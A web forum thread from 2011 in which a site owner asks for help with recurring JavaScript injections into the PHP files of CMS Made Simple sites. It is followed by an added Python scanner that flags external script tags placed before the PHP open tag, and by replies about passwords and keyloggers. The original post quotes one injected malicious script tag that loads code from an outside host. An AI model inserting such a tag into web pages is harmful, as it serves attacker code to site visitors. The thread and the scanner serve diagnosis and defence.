Javascript Injection on various PHP pages

Posted: Fri Apr 22, 2011 1:11 pm
by minneapolisite
Over the past two weeks I have had several of my CMS MS sites hacked. Whatever it is, it's inserting a <script> tag at the head of my PHP files (for sure index.php, admin/login.php, and admin/index.php, possibly more that I haven't found yet).

The scripts always look like this, but with a different path every time.

<script type="text/javascript" src="http://dveri-plus.com.ua/facebook.php"></script>
Googling the various paths has not helped me find a resolution yet.

For my own site (hosted on 1and1.com) I deleted my entire CMS MS install (including the old SQL database) and reinstalled the most recent version. I implemented most of the security suggestions in this sticky thread. (I do not have access/skills to make the Apache/PHP.ini modifications.)

For one of my client sites (hosted on justhost.com) I deleted my entire CMS MS install (but kept the old SQL database) and reinstalled the most recent version. I did not implement additional security measures (planned to do that today, but it was already hit overnight.)

The very next day the hack repeated itself. :(

I'm an HTML/CSS expert, but a SQL/PHP novice. Has anyone else seen this hack, or something like it? Any suggestions on how I can prevent it?

It's possible this isn't a CMS MS issue (it also happened to an instance of Expression Engine stored alongside CMS MS) but the only pattern I see so far is that it's happened on servers on which I have CMS MS installed (no other similarities between the sites/servers.)
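
A triage check for the pattern described in the post above, as an added example that is not part of the original thread: it walks a web root and reports `.php` files in which an external `<script src=...>` tag appears before the first PHP open tag. The function names, the `allowed_hosts` parameter and the `.example` hosts are assumptions, and the sample files are constructed.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# <script ... src="http(s)://..."> ; group 1 captures the URL.
SCRIPT_SRC = re.compile(rb'<script\b[^>]*\bsrc\s*=\s*["\']?(https?://[^"\'\s>]+)', re.I)

def leading_script_urls(data, allowed_hosts=frozenset()):
    """External script URLs that occur before the first '<?' in a file.

    A PHP file normally starts with its open tag, so markup in front of it
    is unusual. Files with no open tag at all are checked in full.
    """
    cut = data.find(b"<?")
    head = data if cut == -1 else data[:cut]
    urls = [u.decode("ascii", "replace") for u in SCRIPT_SRC.findall(head)]
    return [u for u in urls if (urlparse(u).hostname or "") not in allowed_hosts]

def scan_webroot(root, allowed_hosts=frozenset()):
    """Map relative path -> suspicious URLs for every .php file under root."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        try:
            data = path.read_bytes()
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
        urls = leading_script_urls(data, allowed_hosts)
        if urls:
            findings[path.relative_to(root).as_posix()] = urls
    return findings

def demo():
    """Build a small constructed web root and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "admin").mkdir()
        # Constructed sample: tag prepended in front of the PHP open tag.
        (root / "index.php").write_bytes(
            b'<script type="text/javascript" src="http://injected.example/a.php">'
            b'</script><?php echo 1; ?>')
        # Script tag emitted by the page's own PHP code: not flagged.
        (root / "admin" / "login.php").write_bytes(
            b"<?php echo '<script src=\"http://cdn.example/x.js\"></script>'; ?>")
        # Template with a leading tag from an allowlisted host: not flagged.
        (root / "tpl.php").write_bytes(
            b'<script src="https://cdn.example/lib.js"></script><?php ?>')
        return scan_webroot(root, allowed_hosts={"cdn.example"})

if __name__ == "__main__":
    print(demo())
```

Comparing each flagged file's modification time with the FTP and web server logs for the same period helps narrow down how the files were written.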

Re: Javascript Injection on various PHP pages

Posted: Fri Apr 22, 2011 1:15 pm
by M@rtijn
We have not seen this hack before, so I myself don't think it's related to CMSMS.

Did you change passwords and database connections between the first and second hack?
Is your computer spyware (keylogger) free?
Are there any other websites on the same host that are having the same problem?

Re: Javascript Injection on various PHP pages

Posted: Fri Apr 22, 2011 1:24 pm
by minneapolisite
Thanks for the fast reply.

My computer possibly had keyloggers on it at one point, but it is clean now (I have recently run the latest version of Spybot S&D and Malwarebytes Anti-Malware, and run Symantec Anti-Virus at all times. I just re-ran Spybot this morning to double-check and it came up clean.)

On the client site, I reused the old database with the old password. (Whoops.)

On my own site I most definitely changed database connections/passwords, since I completely deleted the old database and created a new one with a new name, username, and password. I also definitely created this new database and new CMS MS install when my computer was keylogger free.

Something new in my life: I am running Apache and PHP on my PC and opened up port 81 to do so. However, I'm not sure how this would affect a site that I hadn't even visited in months, much less FTPed or logged in to. :/